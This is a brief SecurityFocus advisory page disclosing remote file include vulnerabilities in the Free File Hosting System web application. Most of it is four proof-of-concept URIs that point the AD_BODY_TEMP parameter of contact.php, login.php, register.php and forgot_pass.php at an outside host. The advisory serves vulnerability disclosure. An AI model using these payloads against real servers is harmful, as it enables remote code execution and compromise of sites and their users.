Free File Hosting System Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/contact.php?AD_BODY_TEMP=http://www.example2.com
http://www.example.com/login.php?AD_BODY_TEMP=http://www.example2.com
http://www.example.com/register.php?AD_BODY_TEMP=http://www.example2.com
http://www.example.com/forgot_pass.php?AD_BODY_TEMP=http://www.example2.com


 

Privacy Statement
Copyright 2010, SecurityFocus